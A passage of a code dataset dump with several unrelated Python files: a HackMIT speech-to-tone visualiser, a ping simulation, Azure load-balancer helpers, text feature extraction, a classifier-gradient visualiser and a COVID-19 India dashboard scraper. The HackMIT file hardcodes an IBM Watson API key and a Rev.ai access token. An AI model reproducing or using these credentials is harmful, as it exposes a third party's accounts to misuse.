\r\n t4 = Text(Point(170,12),\"Tentative\")\r\n t4.draw(fig)\r\n \r\n r6 = Rectangle(Point(112,25), Point(132,45))\r\n r6.setFill('pink')\r\n r6.draw(fig)\r\n \r\n t6 = Text(Point(156,37),\"Fear\")\r\n t6.draw(fig)\r\n \r\n r7 = Rectangle(Point(112,50), Point(132,70))\r\n r7.setFill('white')\r\n r7.draw(fig)\r\n \r\n t7 = Text(Point(168,62),\"Analytic\")\r\n t7.draw(fig)\r\n \r\n\r\n'''\r\nc1 = Circle(Point(10,10),10)\r\nc1.draw(fig)\r\nfig_list.append(c1)\r\nc2 = Circle(Point(10,10),10)\r\nfig_list.append(c2)\r\nc2.draw(fig)\r\n'''\r\n\r\ndef simple_update(fig,fig_list,dictionary):\r\n print(\"SIMPLE UPDATING\")\r\n for item in fig_list:\r\n item.canvas.delete('all')\r\n fig_list = []\r\n set_header()\r\n fig.update()\r\n dcopy = dict(dictionary)\r\n highest = {}\r\n if len(dcopy) > 0:\r\n for key in dcopy:\r\n if dcopy[key] == max(dcopy.values()):\r\n highest[key] = dcopy[key]\r\n radius = max(dcopy.values())\r\n best_key = key\r\n if best_key == 'Fear':\r\n c=('Pink')\r\n if best_key == 'Joy':\r\n c=('yellow')\r\n if best_key == 'Sadness':\r\n c=('blue')\r\n if best_key == 'Analytical':\r\n c=('white')\r\n if best_key == 'Tentative':\r\n c=('black') \r\n if best_key == 'Confident':\r\n c=('green') \r\n if best_key == 'Anger':\r\n c=('Red')\r\n del(dcopy[best_key])\r\n t = (Circle(Point(500,500),highest[best_key]))\r\n t.setFill(c)\r\n t.draw(fig)\r\n #fig_list.append((Circle(Point(500,500),highest[best_key])).draw(fig))\r\n pi = np.pi\r\n intervals = []\r\n if len(dcopy) > 0:\r\n radian_interval = 2*pi/(len(dcopy))\r\n else:\r\n radian_interval = 0\r\n n = 0\r\n for key in dcopy.keys():\r\n temp = (Circle(Point((radius+dcopy[key])*np.cos(n*radian_interval)+500,(radius+dcopy[key])*np.sin(n*radian_interval)+500),dcopy[key]))\r\n if key == 'Fear':\r\n temp.setFill('Pink')\r\n if key == 'Joy':\r\n temp.setFill('yellow')\r\n if key == 'Sadness':\r\n temp.setFill('blue')\r\n if key == 'Analytical':\r\n temp.setFill('white')\r\n if key == 'Tentative':\r\n temp.setFill('black')\r\n if key == 'Confident':\r\n temp.setFill('green')\r\n if key == 'Anger':\r\n temp.setFill('Red') \r\n temp.draw(fig)\r\n fig_list.append(temp)\r\n n+=1\r\n return (fig,fig_list)\r\n\r\n\r\ntone_analyzer = ToneAnalyzerV3(version='2017-09-21',iam_apikey='DdFanI4TaHrDEKTITRDD7EOK6QaxkFv39Nmuvdov6NCi',url='https://gateway-syd.watsonplatform.net/tone-analyzer/api')\r\n\r\n\r\nclass MicrophoneStream(object):\r\n \"\"\"Opens a recording stream as a generator yielding the audio chunks.\"\"\"\r\n def __init__(self, rate, chunk):\r\n self._rate = rate\r\n self._chunk = chunk\r\n # Create a thread-safe buffer of audio data\r\n self._buff = queue.Queue()\r\n self.closed = True\r\n def __enter__(self):\r\n self._audio_interface = pyaudio.PyAudio()\r\n self._audio_stream = self._audio_interface.open(\r\n format=pyaudio.paInt16,\r\n # The API currently only supports 1-channel (mono) audio\r\n channels=1, rate=self._rate,\r\n input=True, frames_per_buffer=self._chunk,\r\n # Run the audio stream asynchronously to fill the buffer object.\r\n # This is necessary so that the input device's buffer doesn't\r\n # overflow while the calling thread makes network requests, etc.\r\n stream_callback=self._fill_buffer,\r\n )\r\n self.closed = False\r\n return self\r\n def __exit__(self, type, value, traceback):\r\n self._audio_stream.stop_stream()\r\n self._audio_stream.close()\r\n self.closed = True\r\n # Signal the generator to terminate so that the client's\r\n # streaming_recognize method will not block the process termination.\r\n self._buff.put(None)\r\n self._audio_interface.terminate()\r\n def _fill_buffer(self, in_data, frame_count, time_info, status_flags):\r\n \"\"\"Continuously collect data from the audio stream, into the buffer.\"\"\"\r\n self._buff.put(in_data)\r\n return None, pyaudio.paContinue\r\n def generator(self):\r\n while not self.closed:\r\n # Use a blocking get() to ensure there's at least one chunk of\r\n # data, and stop iteration if the chunk is None, indicating the\r\n # end of the audio stream.\r\n chunk = self._buff.get()\r\n if chunk is None:\r\n return\r\n data = [chunk]\r\n # Now consume whatever other data's still buffered.\r\n while True:\r\n try:\r\n chunk = self._buff.get(block=False)\r\n if chunk is None:\r\n return\r\n data.append(chunk)\r\n except queue.Empty:\r\n break\r\n yield b''.join(data)\r\n# Sampling rate of your microphone and desired chunk size\r\nrate = 44100\r\nchunk = int(rate/10)\r\n# Insert your access token here\r\naccess_token = \"025B_jazWiRLZ9kbTJUQWLNG9OCAgM3M2_LF0LZAxvFzOF740DssyFBwON0aAsgjWXPmn8ufNyUVrQUfR0vEGfQPAjzyw\"\r\n# Creates a media config with the settings set for a raw microphone input\r\nexample_mc = MediaConfig('audio/x-raw', 'interleaved', 44100, 'S16LE', 1)\r\nstreamclient = RevAiStreamingClient(access_token, example_mc)\r\n# Opens microphone input. The input will stop after a keyboard interrupt.\r\n\r\nwith MicrophoneStream(rate, chunk) as stream:\r\n # Uses try method to allow users to manually close the stream\r\n try: \r\n # Starts the server connection and thread sending microphone audio\r\n response_gen = streamclient.start(stream.generator())\r\n # Iterates through responses and prints them\r\n for response in response_gen:\r\n modified = False\r\n tones = {}\r\n words = []\r\n words2=[]\r\n rdict = (ast.literal_eval(response))\r\n if rdict['type'] == 'partial':\r\n for d in rdict['elements']:\r\n words.append(d['value'])\r\n if rdict['type'] == 'final':\r\n for d in rdict['elements']:\r\n if d['value'] not in [' ', ',','.',';']:\r\n words2.append(d['value'])\r\n if len(words) > 0:\r\n #the maybe words\r\n #print(words[-1])\r\n 1==1\r\n \r\n \r\n if len(words2) > 0:\r\n full_words = ''\r\n for char in words2:\r\n full_words+=char+\" \"\r\n #t0.draw(fig)\r\n text = str(words2)[1:-1]\r\n tone_analysis = tone_analyzer.tone({'text': text},content_type='application/json').get_result()['document_tone']['tones']\r\n for tone in tone_analysis:\r\n tones[tone['tone_name']] = tone['score']\r\n #print(tones)\r\n for key in tones.keys():\r\n if key not in mood_dict:\r\n mood_dict[key] = 100*float(tones[key])\r\n modified = True\r\n else: \r\n mood_dict[key] = (mood_dict[key]+ 100*float(tones[key]))\r\n modified = True\r\n for key in mood_dict.keys():\r\n mood_dict[key] = mood_dict[key]*.94\r\n #print(\"MOOD DICT\",mood_dict)\r\n \r\n results = simple_update(fig,fig_list,mood_dict)\r\n fig = results[0]\r\n fig_list = results[1]\r\n \r\n except KeyboardInterrupt:\r\n # Ends the websocket connection.\r\n streamclient.client.send(\"EOS\")\r\n fig.close()\r\n pass","sub_path":"HackMIT2019.py","file_name":"HackMIT2019.py","file_ext":"py","file_size_in_byte":9250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"568339263","text":"import getopt\nimport sys\nfrom Simulator import Simulation\nimport numpy as np\n\nargumentHash = {'SIM_TIME': None, 'isFixedLatency': False, 'maxLatency': None, 'numLP':2}\n#if fixed, lower limit is equal to 1\n\n\nclass LPS:\n staticSim = None\n def __init__(self, thisID):\n self.thisID = thisID\n self.dstLP = None\n self.numRecieved = 0\n self.numSent = 0\n self.state = 0\n\n def generateInitialEvent(self):\n #state 0 means event created and put into queue\n #state 1 means event recieved, send new event, go to eventArrived\n #state 2 means finish. End state\n #timestamp is estimated arrival\n self.state = 0\n self.setDstLP((self.thisID+1) % argumentHash['numLP'])\n #constant LP\n if argumentHash['isFixedLatency']:\n latency = argumentHash['maxLatency']\n #randomLatency\n else:\n latency = np.random.randint(low=1, high=argumentHash['maxLatency']+1)\n dataList = {'destLP': self.dstLP, 'state': self.state}\n time_stamp = LPS.staticSim.getCurrTime() + latency #depart_time\n msgNode = LPS.staticSim.createMessage(dataList, time_stamp)\n LPS.staticSim.sendMessage(msgNode)\n\n def generateEvent(self):\n self.state = 1\n self.setDstLP((self.thisID+1) % argumentHash['numLP'])\n #constant LP\n if argumentHash['isFixedLatency']:\n latency = argumentHash['maxLatency']\n #randomLatency\n else:\n latency = np.random.randint(low=1, high=argumentHash['maxLatency']+1)\n dataList = {'destLP': self.dstLP, 'state': self.state}\n time_stamp = LPS.staticSim.getCurrTime() + latency #depart_time\n msgNode = LPS.staticSim.createMessage(dataList, time_stamp)\n LPS.staticSim.sendMessage(msgNode)\n def finishEvent(self):\n #event finished, do nothing\n self.state = 2\n\n\n def setDstLP(self, destLP):\n self.dstLP = destLP\n\n @staticmethod\n def setSim(ss):\n LPS.staticSim = ss\n\n\ndef prossargs():\n try:\n opt, args = getopt.getopt(sys.argv[1:], \"s:fk:\")\n except getopt.GetoptError:\n usage()\n sys.exit(2)\n for opts, arg in opt:\n if opts == '-s':\n if not arg.isdigit():\n usage()\n elif int(arg) <=0:\n print('Cannot have simtime <= 0, exiting...')\n else:\n argumentHash['SIM_TIME'] = int(arg)\n elif opts == '-f':\n argumentHash['isFixedLatency'] = True\n elif opts == '-k':\n if not arg.isdigit():\n usage()\n elif int(arg) <=0:\n print('Cannot have K <= 0, exiting...')\n else:\n argumentHash['maxLatency'] = int(arg)\n for a in argumentHash.keys():\n if argumentHash[a] is None:\n usage()\n\n\ndef usage():\n print('please input only int values for args')\n print(\n \"python ping.py -s 'INT-TIME' [-f optional ] -k 'INT -upper Latency'\")\n exit(2)\n\n\n#onLp is the number of which LP currently being created.\n\n\nprossargs()\n\nlistOfLp=list()\n\nfor lps in range(argumentHash['numLP']):\n listOfLp.append(LPS(lps))\n\ns = Simulation(simTime=argumentHash['SIM_TIME'], latencyUpper=argumentHash['maxLatency'], isLatencyConstant=argumentHash['isFixedLatency'], lpList=listOfLp)\nLPS.setSim(s)\ns.simulate()\nprint(\"Number of total trip: {}\".format(s.getNumTotalTrips()))\nprint(\"Number of total round trips: {}\".format(s.getNumRoundTrips()))","sub_path":"ping.py","file_name":"ping.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"549642076","text":"#!/usr/bin/env python\n\nimport json,sys\nfrom util import print_error, print_log, print_result\n\n\ndef deunicodify_hook(pairs):\n new_pairs = []\n for key, value in pairs:\n if isinstance(value, unicode):\n value = value.encode('utf-8')\n if isinstance(key, unicode):\n key = key.encode('utf-8')\n new_pairs.append((key, value))\n return dict(new_pairs)\n\ndef construct_fip_id(subscription_id, group_name, lb_name, fip_name):\n \"\"\"Build the future FrontEndId based on components name.\n \"\"\"\n return ('/subscriptions/{}'\n '/resourceGroups/{}'\n '/providers/Microsoft.Network'\n '/loadBalancers/{}'\n '/frontendIPConfigurations/{}').format(\n subscription_id, group_name, lb_name, fip_name\n )\n\ndef construct_bap_id(subscription_id, group_name, lb_name, address_pool_name):\n \"\"\"Build the future BackEndId based on components name.\n \"\"\"\n return ('/subscriptions/{}'\n '/resourceGroups/{}'\n '/providers/Microsoft.Network'\n '/loadBalancers/{}'\n '/backendAddressPools/{}').format(\n subscription_id, group_name, lb_name, address_pool_name\n )\n\ndef construct_probe_id(subscription_id, group_name, lb_name, probe_name):\n \"\"\"Build the future ProbeId based on components name.\n \"\"\"\n return ('/subscriptions/{}'\n '/resourceGroups/{}'\n '/providers/Microsoft.Network'\n '/loadBalancers/{}'\n '/probes/{}').format(\n subscription_id, group_name, lb_name, probe_name\n ) \n\ndef update_nic_paramaters(address_pool_id, location, nic_info, params):\n \"\"\"Update the NIC parameters structure.\n \"\"\"\n nic_params = params['nicParams']\n nic_params['location'] = location\n nic_params['ip_configurations'][0]['name'] = nic_info.ip_configurations[0].name\n nic_params['ip_configurations'][0]['subnet']['id'] = nic_info.ip_configurations[0].subnet.id\n nic_params['ip_configurations'][0]['load_balancer_backend_address_pools'] = [{\n \"id\": address_pool_id\n }]\n\n return nic_params\n\n #nic_params['ip_configurations'][0]['load_balancer_inbound_nat_rules'][0]['id'] = natrule_id\n\ndef create_vm_parameters(nic_id, is_nic_primary, location, vm_info, params):\n \"\"\"Create the VM parameters structure.\n \"\"\"\n vm_params = params['vmParams']\n vm_params['location'] = location\n vm_params['network_profile']['network_interfaces'][0]['id'] = nic_id\n vm_params['network_profile']['network_interfaces'][0]['primary'] = is_nic_primary\n return vm_params \n\ndef get_error_messages():\n messages = {}\n try:\n with open('error_messages.json', 'r') as file:\n messages = json.loads(str(file.read()), object_pairs_hook=deunicodify_hook)\n except Exception as err:\n print_error('failed to load parmaters json!')\n sys.exit(127)\n\n return messages\n\ndef generate_params_error_message(parameters, error_message):\n reason = \"\"\n if isinstance(parameters, list):\n reason = ','.join(parameters)\n else:\n reason = parameters\n\n reason += \" ,\" + error_message\n return reason\n\n\ndef write_log(err):\n f = open('FAILURE','w')\n f.write(str(err))\n f.close()\n\ndef error_messages():\n global error_messages\n error_messages = get_error_messages()\n\nerror_messages()","sub_path":"Content/Networking/DNS/Azure/AzureDnsZones/WorkloadManager/src/Azure_dns_zones/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"537849782","text":"\"\"\" Module for feature extraction based on special characters (e.g. ? ! .) \"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom path_helper import get_project_root\n\n\nclass SpecialCharacters:\n \"\"\" Extract list of special characters (list is set in constructor) \"\"\"\n\n def __init__(self):\n self.list_of_special_characters = {\n \"exclamation_mark\": \"!\",\n \"question_mark\": \"?\",\n \"full_stop_mark\": \".\",\n }\n\n def extract_features(self, df, visualize=False):\n \"\"\"Extract number of special characters per data instance\n Parameters:\n df with the columns: class and content\n Return:\n passed df with new feature columns containing the count of the special character\n \"\"\"\n for key in self.list_of_special_characters:\n df = self._count_number_of_special_characters(\n key, self.list_of_special_characters[key], df\n )\n if visualize:\n self.visualize_special_characters(df)\n return df\n\n def _count_number_of_special_characters(self, character_name, character, df):\n feature_name = \"number_of_\" + character_name\n df[feature_name] = df[\"content\"].apply(\n lambda cell: self._count_character(cell, character)\n )\n return df\n\n @staticmethod\n def _count_character(sentence, character):\n return sentence.count(character)\n\n def visualize_special_characters(self, df):\n \"\"\"Visualizes the number of special characters as bar plot\n Parameters:\n df: dataframe with the extracted features for special characters\n Return:\n stores barplots in analysis folder\n \"\"\"\n df_hate_speech = df[df[\"class\"] == 0]\n df_neutral_speech = df[df[\"class\"] == 1]\n for character in self.list_of_special_characters:\n hate_bincount = self._calculate_bincount_of_special_character(\n df_hate_speech, character\n )\n neutral_bincount = self._calculate_bincount_of_special_character(\n df_neutral_speech, character\n )\n\n hate_bincount_summarized = self._summarize_bincount_data(hate_bincount)\n neutral_bincount_summarized = self._summarize_bincount_data(\n neutral_bincount\n )\n\n x = np.arange(11)\n plt.bar(x + 0.0, hate_bincount_summarized, color=\"r\", width=0.2)\n plt.bar(x + 0.2, neutral_bincount_summarized, color=\"b\", width=0.2)\n x_ticks = [str(x) for x in range(10)]\n x_ticks.append(\">10\")\n plt.xticks(x, x_ticks)\n plt.title(\n \"Number of data instances with number of \"\n + self.list_of_special_characters[character]\n )\n plt.xlabel(\"Number of \" + character)\n plt.ylabel(\"Number of data instances\")\n plt.legend([\"hate speech\", \"neutral speech\"])\n plt.savefig(\n str(get_project_root())\n + \"/analysis/features/semantic/barchart_special_character_\"\n + character\n )\n\n def _calculate_bincount_of_special_character(self, df, character):\n return np.bincount(np.array(df[\"number_of_\" + character]))\n\n def _summarize_bincount_data(self, array):\n return np.append(array[:10], array[10:].sum())\n","sub_path":"src/feature_extraction/semantic/special_characters.py","file_name":"special_characters.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"459766823","text":"import numpy as np\nfrom sklearn import datasets\nfrom scipy.sparse.linalg import eigs\nfrom plot_slices import plot2d\nfrom sklearn_digits_tut import get_digits_classifier\n\n# Implements the visualisation method described in Adel et al.\n# 3D scattering transforms for disease classification in neuroimaging (2017).\n\n\ndef approximate_gradient(classifier, x, X, k=6, epsilon=1e-5):\n \"\"\"\n classifier: outputs probability of vector x belonging to a certain class (G(x) in paper)\n x: input feature vector\n X: training data set (needed in order to calculate priciple directions)\n k: number of principle directions to use in approximating the gradient of the classifier G(x).\n epsilon: magnitude of perturbation (must be small.)\n \"\"\"\n\n # Each row represents an observation\n covariance_matrix = np.cov(X, rowvar=False)\n eigenvalues, eigenvectors = eigs(covariance_matrix, k=k)\n eigenvalues, eigenvectors = np.real(eigenvalues), np.real(eigenvectors)\n\n classifier_x = classifier.decision_function(x.reshape((1, -1)))\n gradient = np.zeros(eigenvectors.shape[0])\n for i in range(k):\n eigenvector = eigenvectors[:, i]\n gradient += ((classifier_x - classifier.decision_function((x + epsilon*eigenvector).reshape((1, -1)))) / epsilon) * eigenvector\n\n return gradient\n\n\ndef visualize_gradient(gradient):\n # reshape back to 2D array representing image.\n gradient = np.reshape(gradient, (int(np.sqrt(gradient.shape[0])), int(np.sqrt(gradient.shape[0]))))\n plot2d(gradient)\n\n\ndef stub_classifier(x):\n return np.random.rand()\n\n\nif __name__ == '__main__':\n digits = datasets.load_digits()\n feature_vectors = digits.data\n x = feature_vectors[0]\n k = 6\n\n gradient = approximate_gradient(stub_classifier, x, feature_vectors, k)\n visualize_gradient(gradient)\n","sub_path":"visualisation_gradient.py","file_name":"visualisation_gradient.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"269911838","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\npd.options.display.max_columns= None\npd.options.display.max_rows= None\nfrom datetime import date \n\n# Scraping\nimport requests \nfrom bs4 import BeautifulSoup \nimport numpy as np \n\n# Dashboarding\nimport dash\nimport plotly.graph_objects as go\nimport plotly.express as px\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_daq as daq\nfrom dash.dependencies import Input, Output\nfrom plotly.subplots import make_subplots\n\n\n# In[2]:\n\n\nextract_contents = lambda row: [x.text.replace('\\n', '') for x in row] \ngovt = 'https://www.mohfw.gov.in/'\n\nresponse = requests.get(govt).content \nsoup = BeautifulSoup(response, 'html.parser') \n\nstats = [] \nall_rows = soup.find_all('tr') \n\nfor row in all_rows:\n stat= extract_contents(row.find_all('td'))\n print(stat)\n if len(stat)>=5:\n stats.append(stat)\n\n\n# In[3]:\n\n\nheaders= ['Sno', 'State', 'Active', 'Recovery', 'Death', 'Confirmed']\n\n\n# In[4]:\n\n\ndf= pd.DataFrame(stats, columns= headers).set_index('State')\ndf.drop(['Sno'], axis= 1, inplace= True)\ndf= df.replace({'#': ''}, regex=True)\ndf= df.replace({'*': ''})\n#df= df.astype(int)\n\n\n# In[5]:\n\n\nn= len(df) - 1\nc= df['Confirmed'].tail(1)[0]\nd= df['Death'].tail(1)[0]\nr= df['Recovery'].tail(1)[0]\n\n\n# In[6]:\n\n\ndf.rename({'Total#': 'India'}, axis='index', inplace= True)\n#df.drop(['Cases being reassigned to states'], inplace= True)\ndf= df.astype(int)\ndf_a= df.drop(['India']).sort_values(['Confirmed'])\ndf_d= df.drop(['India']).sort_values(['Confirmed'], ascending= False)\n\n\n# In[7]:\n\n\nhnames= []\nhnames.append({'label': 'WB helpline 1', 'value': 'wb1'})\nhnames.append({'label': 'WB helpline 2', 'value': 'wb2'})\nhnames.append({'label': 'Beliaghata ID', 'value': 'id'})\nhnames.append({'label': 'PG Hospital', 'value': 'pg'})\nhnames.append({'label': 'R G Kar', 'value': 'rg'})\n\n\n# In[8]:\n\n\nhphone= []\nhphone.append({'label': 'wb1', 'value': '033-24312600'})\nhphone.append({'label': 'wb2', 'value': '1800313444222'})\nhphone.append({'label': 'id', 'value': '033-23032200'})\nhphone.append({'label': 'pg', 'value': '033-22041101'})\nhphone.append({'label': 'rg', 'value': '033-25557656'})\nhphone.append({'label': 'nb', 'value': '0353 258 5478'})\n\n\n# In[9]:\n\n\nhloc= []\nhloc.append({'label': 'wb1', 'value': 'None'})\nhloc.append({'label': 'wb2', 'value': 'None'})\nhloc.append({'label': 'id', 'value': 'Phoolbagan, Kolkata 700010'})\nhloc.append({'label': 'pg', 'value': 'AJC Bose Rd, Kolkata 700020'})\nhloc.append({'label': 'rg', 'value': 'KB Sarani, Kolkata 700004'})\nhloc.append({'label': 'nb', 'value': 'Sushruta Nagar, Siliguri 734012'})\n\n\n# In[10]:\n\n\nheading1= 'COVID-19 @ INDIA'\nhelpp= '+91-11-23978046, 1075'\nid_help= ' ID: 033-23032200'\nrg_help= ' RG Kar: 033-25557656'\npg_help= ' PG: 033-22041101'\nwb_help= ' WB Helpline: 033-24312600'\nnb_help= ' NBMC: 0353 258 5478'\n\n\n# In[11]:\n\n\nst_ab= {\n 'AP': 'Andhra Pradesh',\n 'AR': 'Arunachal Pradesh',\n 'AS': 'Assam',\n 'BR': 'Bihar',\n 'CG': 'Chhattisgarh',\n 'GA': 'Goa',\n 'GJ': 'Gujarat',\n 'HR': 'Haryana',\n 'HP': 'Himachal Pradesh',\n 'JK': 'Jammu and Kashmir',\n 'JH': 'Jharkhand',\n 'KA': 'Karnataka',\n 'KL': 'Kerala',\n 'MP': 'Madhya Pradesh',\n 'MH': 'Maharashtra',\n 'MN': 'Manipur',\n 'ML': 'Meghalaya',\n 'MZ': 'Mizoram',\n 'NL': 'Nagaland',\n 'OR': 'Orissa',\n 'PB': 'Punjab',\n 'RJ': 'Rajasthan',\n 'SK': 'Sikkim',\n 'TN': 'Tamil Nadu',\n 'TR': 'Tripura',\n 'UK': 'Uttarakhand',\n 'UP': 'Uttar Pradesh',\n 'WB': 'West Bengal',\n 'AN': 'Andaman and Nicobar Islands',\n 'CH': 'Chandigarh',\n 'DH': 'Dadra and Nagar Haveli',\n 'DD': 'Daman and Diu',\n 'DL': 'Delhi',\n 'LD': 'Lakshadweep',\n 'PY': 'Pondicherry',\n 'TG': 'Telengana',\n 'UT': 'Uttarakhand',\n 'LA': 'Ladakh',\n 'DN': 'Dadra and Nagar Haveli',\n}\n\n\n# In[12]:\n\n\nupdt= 'updated on ' + str(date.today())\nstates= []\nfor i in df.index.tolist():\n states.append({'label': i, 'value': i})\n\n\n# In[13]:\n\n\nindiats= 'https://api.covid19india.org/csv/latest/case_time_series.csv'\nsw= 'https://api.covid19india.org/csv/latest/state_wise.csv'\nsw= pd.read_csv(sw)\ndsw= 'https://api.covid19india.org/csv/latest/state_wise_daily.csv'\ndsw= pd.read_csv(dsw, )\ndfts= pd.read_csv(indiats)\ndfts['Date']= dfts['Date'].str[0:6]\n#sw['Date']= sw['Date'].str[0:6]\ndsw['Date']= dsw['Date'].str[0:6].str.replace('-', ' ')\n#dsw['Date']\n\n\n# In[27]:\n\n\nstatewise_tested_numbers_data= 'https://api.covid19india.org/csv/latest/statewise_tested_numbers_data.csv'\nstnd= pd.read_csv(statewise_tested_numbers_data)\nstndd= stnd.groupby(['State']).last().reset_index()\n#stndd['Population NCP 2019 Projection'].replace({',': ''}, regex= True, inplace= True)\nstndd.set_index(['State'], inplace= True)\nstndd.loc['India', 'Total Tested']= stndd['Total Tested'].sum()\nstndd.loc['India', 'Positive']= stndd['Positive'].sum()\nstndd['Negative']= stndd['Negative'].str.strip('+')\nstndd['Negative']= stndd['Negative'].fillna(0).replace(' ', 0).astype(float, )\nstndd.loc['India', 'Negative']= stndd['Negative'].sum()\nstndd.loc['India', 'Unconfirmed']= stndd['Unconfirmed'].sum()\nstndd['Population NCP 2019 Projection']= stndd['Population NCP 2019 Projection'].dropna().astype(int)\nstndd.loc['India', 'Population NCP 2019 Projection']= stndd['Population NCP 2019 Projection'].sum()\nstndd.loc['India', 'Tests per thousand']= stndd['Tests per thousand'].mean()\n\nstndd.loc['India', 'Test positivity rate']= round((stndd.loc['India', 'Positive']/stndd.loc['India', 'Total Tested'])*100, 2)\nstndd.loc['India', 'Test positivity rate']= str(stndd.loc['India', 'Test positivity rate']) + '%'\n\n\n# In[28]:\n\n\ntnid= 'https://api.covid19india.org/csv/latest/tested_numbers_icmr_data.csv'\ntnidf= pd.read_csv(tnid)\n\n\n# In[29]:\n\n\ndates= []\nfor i, j in enumerate(dfts['Date'].tolist()):\n dates.append({'label': j, 'value': i})\n############################################################################# \ndef get_cts(dt1, dt2):\n df= dfts[dfts.index.to_series().between(dt1, dt2)]\n cnfrm= go.Scatter(x= df['Date'], y= df['Total Confirmed'], line= {'color': 'rgb(0, 74, 140)'},\n mode= 'lines+markers', name= 'Confirmed')\n rcvr= go.Scatter(x= df['Date'], y= df['Total Recovered'], line= {'color': 'rgb(0, 74, 140)'},\n mode= 'lines+markers', name= 'Recovered')\n dth= go.Scatter(x= df['Date'], y= df['Total Deceased'], line= {'color': 'rgb(0, 74, 140)'},\n mode= 'lines+markers', name= 'Deceased')\n\n fig = make_subplots(rows=3, cols=1, shared_xaxes=True, vertical_spacing=0.03,\n row_titles=(\"Confirmed\", \"Recovered\", \"Deceased\"))\n fig.append_trace(cnfrm, 1, 1)\n fig.append_trace(rcvr, 2, 1)\n fig.append_trace(dth, 3, 1)\n fig.update_xaxes(dtick= 7)\n fig.update_layout(plot_bgcolor= 'rgba(0,0,0,0)', margin= {'t':0, 'b':0, 'l':0, 'r':50},\n hovermode= 'closest', hoverdistance= 50000, \n showlegend= False, height=350, paper_bgcolor='rgba(0,0,0,0)')\n \n return fig\n############################################################################# \ndef get_dts(dt1, dt2):\n df= dfts[dfts.index.to_series().between(dt1, dt2)]\n cnfrm= go.Bar(x= df['Date'], y= df['Daily Confirmed'], name= 'Confirmed',\n text= df['Daily Confirmed'], textposition='auto',\n marker= {'color': 'rgba(0, 74, 140, 0.4)',\n 'line': {'color': 'rgba(0, 74, 140, 1)', 'width': 2}})\n rcvr= go.Bar(x= df['Date'], y= df['Daily Recovered'], name= 'Recovered',\n text= df['Daily Recovered'], textposition='auto',\n marker= {'color': 'rgba(0, 74, 140, 0.4)',\n 'line': {'color': 'rgba(0, 74, 140, 1)', 'width': 2}})\n dth= go.Bar(x= df['Date'], y= df['Daily Deceased'], name= 'Deceased',\n text= df['Daily Deceased'], textposition='auto',\n marker= {'color': 'rgba(0, 74, 140, 0.4)',\n 'line': {'color': 'rgba(0, 74, 140, 1)', 'width': 2}})\n\n fig = make_subplots(rows=3, cols=1, shared_xaxes=True, vertical_spacing=0.03,\n row_titles=(\"Confirmed\", \"Recovered\", \"Deceased\"))\n fig.append_trace(cnfrm, 1, 1)\n fig.append_trace(rcvr, 2, 1)\n fig.append_trace(dth, 3, 1)\n fig.update_layout(plot_bgcolor= 'rgba(0,0,0,0)', margin= {'t':0, 'b':0, 'l':0, 'r':50}, \n showlegend= False, height=350, paper_bgcolor='rgba(0,0,0,0)',\n \n \n )\n\n \n return fig\n\n\n# In[30]:\n\n\nnos= []\nfor i in [3, 5, 7, 10]:\n nos.append({'label': i, 'value': i})\n#############################################################################\ntb= []\ntb.append({'label': 'Top', 'value': 'Top'})\ntb.append({'label': 'Bottom', 'value': 'Bottom'})\n#############################################################################\nlegend_pos= {'x': 0, 'y': 0.7, 'traceorder': 'normal'}\n############################################################################# \ndef form_bar(tb, sn):\n if tb=='Top':\n temp= df_a\n else:\n temp= df_d\n figb1= go.Figure(data= [go.Bar(x= temp.iloc[-sn:]['Confirmed'], y= temp.iloc[-sn:].index,\n orientation= 'h', width= 0.3, name= 'Confirmed',\n text= temp.iloc[-sn:]['Confirmed'], textposition='auto',\n marker= {'color': 'rgba(0, 74, 140, 0.4)',\n 'line': {'color': 'rgba(0, 74, 140, 1)', 'width': 2}},\n ),\n go.Bar(x= temp.iloc[-sn:]['Recovery'], y= temp.iloc[-sn:].index,\n orientation= 'h', width= 0.4, name= 'Recovered',\n text= temp.iloc[-sn:]['Recovery'], textposition='auto',\n marker= {'color': 'rgba(0, 74, 140, 0.7)',\n 'line': {'color': 'rgba(0, 74, 140, 1)', 'width': 2}},\n ),\n go.Bar(x= temp.iloc[-sn:]['Death'], y= temp.iloc[-sn:].index,\n orientation= 'h', width= 0.5, name= 'Deceased',\n text= temp.iloc[-sn:]['Death'], textposition='auto',\n marker= {'color': 'rgba(0, 74, 140, 1)',\n 'line': {'color': 'rgba(0, 74, 140, 1)', 'width': 2}}),\n ],\n layout= go.Layout(yaxis= {'dtick': 1, 'showgrid': False}, paper_bgcolor='rgba(0,0,0,0)',\n barmode= 'stack', plot_bgcolor='rgba(0,0,0,0)', \n xaxis = {'showgrid': True, 'gridcolor': 'rgba(0, 74, 140, 0.5)'},\n ))\n figb1.update_layout(margin= dict(t=0, b=0, l=0, r=50), legend= dict(x= 0.5, y= 0.5, traceorder= 'normal'),\n legend_orientation=\"h\", height=350,)\n return figb1\n#fig.update_layout(barmode='stack')\n\n\n# In[31]:\n\n\n################################ Tab styling ################################\ntabs_style = {'height': '44px'}\ntab_style = {'padding': '8px', 'color': 'rgb(0, 74, 140)', 'fontFamily': 'Helvetica'}\ntab_selected_style = {\n 'borderTop': '2px solid #004a8c',\n 'borderBottom': '2px solid #004a8c',\n 'backgroundColor': 'rgba(0,74,140, 1)',\n 'color': 'rgb(255, 255, 255)',\n 'padding': '8px',\n 'fontWeight': 'bold',\n 'fontFamily': 'Helvetica',\n 'border-radius': '5px'\n}\n\n\n# In[32]:\n\n\ndf= df.replace('', 0)\ndf= df.astype(float)\n\n\n# In[33]:\n\n\ndf\n\n\n# In[ ]:\n\n\napp = dash.Dash(__name__, external_stylesheets=[dbc.themes.BOOTSTRAP],\n meta_tags= [{'name': 'viewport',\n 'content': 'width=device-width, initial-scale=1'}])\napp.title 